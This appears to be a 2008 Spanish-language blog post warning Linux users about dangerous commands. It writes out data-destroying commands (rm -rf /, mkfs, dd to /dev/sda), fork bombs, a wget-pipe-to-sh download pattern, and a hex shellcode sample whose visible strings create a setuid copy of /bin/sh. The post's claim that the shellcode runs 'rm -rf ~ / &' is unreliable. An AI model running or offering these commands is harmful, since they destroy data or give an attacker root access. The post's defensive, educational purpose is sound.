sábado, 19 de abril de 2008

Comandos peligrosos

Hay mucha gente que nos quiere joder el sistema, y por varios metodos nos quieren colar scripts o hacernos meter comandos riesgozos en una terminal. El objetivo de este texto (obtenido de la comunidad de Ubuntu en inglés) es hacernos mas concientes de los peligrosos comandos en la red y como evitarlos.

- Estos comandos pueden borrar todo lo que encuentren o tengan permisos para escribir.

Código:
rm -rf /
rm -rf .
rm -rf *

Este comando borrará todos los archivos ocultos en el directorio actual:

Código:
rm -r .*


El Siguiente comando borrará todo lo que que está en una carpeta y sus contenidos:

Código:
rm -r .[^.]*


- Estos comandos se meten con tus sistemas de ficheros dañando los datos que tengas:

Código:
mkfs
mkfs.ext3
mkfs.anything


- Manipulacion de bloques en los dispositivos: provoca que datos RAW sean escritos en un bloque del dispositivo, a veces provoca la pérdida de todos tus datos por abuso del sistema de ficheros:

Código:
any_command > /dev/sda
dd if=something of=/dev/sda


Forkbomb: Es un comando que repite procesos de forma infinita hasta congelar el sistema y obligarte a hacer un hard reset, provocando posibles pérdidas de datos:

Código:
:(){:|:&};:


Una forkbomb en Perl:

Código:
fork while fork


Tarbomb: Son archivos tar que al descomprimirse en una carpeta ya existente sobreescriben ficheros y hacen muchos nuevos de forma enfermiza, para evitar esto siempre hay que extraer los ficheros comprimidos en un nuevo directorio limpio.

Decompression bomb: Similar al Tarbomb, estos archivos aparentan ser muy pequeños pero al descomprimirlos llenan tu disco con

Shellscript: A veces alguien te da un enlace para que ejecutes un shellscript. Esto puede contener cualquier comando que comience con -- . No confies y no ejecutes codigos que no estes seguro de su confiabilidad.

Código:
wget http://some_place/some_file
sh ./some_file


Código:
wget http://some_place/some_file -O- | sh


Compilando desde las fuentes: Un problema muy común, donde alguien simplemente te da el código fuente de alguna aplicación y te dice que lo compiles. Al hacer esto comprometes tu equipo puesto que es muy facil ocultar código malicioso en las grandes cantidades de código que por lo general una aplicación o librería tiene. Es por ello que lo mejor es siempre obtener y compilar nuestro software desde fuentes confibles (como la web del autor o SourceForge).

Shellcodes: Una shellcode es un conjunto de órdenes programadas generalmente en lenguaje ensamblador que se inyectan en la pila para conseguir que la máquina en la que reside se ejecute la operación que se haya programado. Se utilizan para ejecutar código aprovechando ciertas vulnerabilidades exploit en el código llamadas desbordamiento de búfer. Principalmente el shellcode se programa para permitir ejecutar un intérprete de comandos en el equipo afectado.

Código:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Esto ultimo en realidad ejecuta 'rm -rf ~ / &', lo cual destruirá todos tus ficheros como usuario regular y todo tu sistema de archivos si eres root. Es por ello que JAMÁS debes confiar en los shellcodes, que aunque para un novato puedan parecer una geekeada hexadecimal es en realidad un peligroso comando.

_________________________________________________________________

En resumen, la seguridad en cualquier sistema UNIX, depende mucho de la cautela de su administrador, evitando usar estos comandos y siguiendo las sugerencias nos acercamos a un sistema mas sano.

2 comentarios:

Anónimo dijo...

Tirate a un pozo, como puedes poner a mkfs como comandos que dañan tu sistema, hacen lo que les pides.

xD

att: gaper

Anónimo dijo...

Gracias mano sigue asi bn comandos :)

Feeds RSS

Suscribete via email

Enter your email address:

Delivered by FeedBurner